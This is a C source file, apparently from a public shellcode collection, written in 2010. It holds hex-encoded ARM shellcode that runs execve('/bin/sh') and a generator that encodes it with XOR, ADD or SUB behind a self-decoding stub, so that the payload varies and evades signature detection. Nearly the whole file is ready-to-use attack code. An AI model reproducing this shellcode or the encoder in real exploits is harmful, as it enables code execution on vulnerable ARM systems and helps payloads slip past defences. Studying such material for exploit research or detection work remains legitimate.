ARM - execve("/bin/sh", ["/bin/sh"], NULL) Shellcode

1. /*
2. Title: Generator polymorphic shellcode on ARM architecture
3. Date: 2010-07-07
4. Tested on: ARM926EJ-S rev 5 (v5l)
5.  
6. Author: Jonathan Salwan
7. Web: http://shell-storm.org | http://twitter.com/jonathansalwan
8.  
9. ! Database of shellcodes http://www.shell-storm.org/shellcode/
10.  
11. Credit
12. ======
13. This code generates a shellcode polymorphic execve("/bin/sh", ["/bin/sh"], NULL)
14. on ARM architecture.
15.  
16. You can encode your shellcode with XOR, ADD, SUB
17. */
18.  
19.  
20.  
21. #include <stdio.h>
22. #include <stdio.h>
23.  
24. /* execve("/bin/sh", ["/bin/sh"], NULL); */
25.  
26. unsigned char your_SC[] = "\x01\x30\x8f\xe2"
27. "\x13\xff\x2f\xe1"
28. "\x78\x46\x0a\x30"
29. "\x01\x90\x01\xa9"
30. "\x92\x1a\x0b\x27"
31. "\x01\xdf\x2f\x2f"
32. "\x62\x69\x6e\x2f"
33. "\x73\x68";
34.  
35.  
36. void syntax(void)
37. {
38. fprintf(stdout,"\nSyntax: ./encode <type> <value>\n\n");
39. fprintf(stdout,"Type: -xor\n");
40. fprintf(stdout," -add\n");
41. fprintf(stdout," -sub\n\n");
42. fprintf(stdout,"Exemple: ./encode -xor 20\n\n");
43. exit(1);
44. }
45.  
46. int main(int argc, char *argv[])
47. {
48. if(argc != 3){
49. syntax();
50. return 1;
51. }
52.  
53.  
54. if(!strcmp(argv[1], "-xor"))
55. {
56. fprintf(stdout,"Encode : XOR %s\n", argv[2]);
57. fprintf(stdout,"Encoded: \n");
58.  
59. int num = (256-strlen(your_SC))+1;
60. int num2 = num + 1;
61.  
62. fprintf(stdout, "\\x24\\x60\\x8f\\xe2"
63. "\\x16\\xff\\x2f\\xe1"
64. "\\x%.2x\\x40\\xa0\\xe3"
65. "\\x01\\x0c\\x54\\xe3"
66. "\\x1e\\xff\\x2f\\x81"
67. "\\x%.2x\\x40\\x44\\xe2"
68. "\\x04\\x50\\xde\\xe7"
69. "\\x%.2x\\x50\\x25\\xe2"
70. "\\x04\\x50\\xce\\xe7"
71. "\\x%.2x\\x40\\x84\\xe2"
72. "\\xf7\\xff\\xff\\xea"
73. "\\xf5\\xff\\xff\\xeb"
74. ,num, num, atoi(argv[2]), num2);
75.  
76. for (int i=0;i<sizeof(your_SC)-1;i++){
77. your_SC[i] = your_SC[i]^atoi(argv[2]);
78. fprintf(stdout,"\\x%.2x", your_SC[i]);
79. }
80. fprintf(stdout,"\n");
81. }
82.  
83.  
84. if(!strcmp(argv[1], "-add"))
85. {
86. fprintf(stdout,"Encode : ADD %s\n", argv[2]);
87. fprintf(stdout,"Encoded: \n");
88.  
89. int num = (256-strlen(your_SC))+1;
90. int num2 = num + 1;
91.  
92. fprintf(stdout, "\\x24\\x60\\x8f\\xe2"
93. "\\x16\\xff\\x2f\\xe1"
94. "\\x%.2x\\x40\\xa0\\xe3"
95. "\\x01\\x0c\\x54\\xe3"
96. "\\x1e\\xff\\x2f\\x81"
97. "\\x%.2x\\x40\\x44\\xe2"
98. "\\x04\\x50\\xde\\xe7"
99. "\\x%.2x\\x50\\x45\\xe2"
100. "\\x04\\x50\\xce\\xe7"
101. "\\x%.2x\\x40\\x84\\xe2"
102. "\\xf7\\xff\\xff\\xea"
103. "\\xf5\\xff\\xff\\xeb"
104. ,num, num, atoi(argv[2]), num2);
105.  
106. for (int i=0;i<sizeof(your_SC)-1;i++){
107. your_SC[i] = your_SC[i]+atoi(argv[2]);
108. fprintf(stdout,"\\x%.2x", your_SC[i]);
109. }
110. fprintf(stdout,"\n");
111. }
112.  
113. if(!strcmp(argv[1], "-sub"))
114. {
115. fprintf(stdout,"Encode : SUB %s\n", argv[2]);
116. fprintf(stdout,"Encoded: \n");
117.  
118. int num = (256-strlen(your_SC))+1;
119. int num2 = num + 1;
120.  
121. fprintf(stdout, "\\x24\\x60\\x8f\\xe2"
122. "\\x16\\xff\\x2f\\xe1"
123. "\\x%.2x\\x40\\xa0\\xe3"
124. "\\x01\\x0c\\x54\\xe3"
125. "\\x1e\\xff\\x2f\\x81"
126. "\\x%.2x\\x40\\x44\\xe2"
127. "\\x04\\x50\\xde\\xe7"
128. "\\x%.2x\\x50\\x85\\xe2"
129. "\\x04\\x50\\xce\\xe7"
130. "\\x%.2x\\x40\\x84\\xe2"
131. "\\xf7\\xff\\xff\\xea"
132. "\\xf5\\xff\\xff\\xeb"
133. ,num, num, atoi(argv[2]), num2);
134.  
135. for (int i=0;i<sizeof(your_SC)-1;i++){
136. your_SC[i] = your_SC[i]-atoi(argv[2]);
137. fprintf(stdout,"\\x%.2x", your_SC[i]);
138. }
139. fprintf(stdout,"\n");
140. }
141.  
142. return 0;
143. }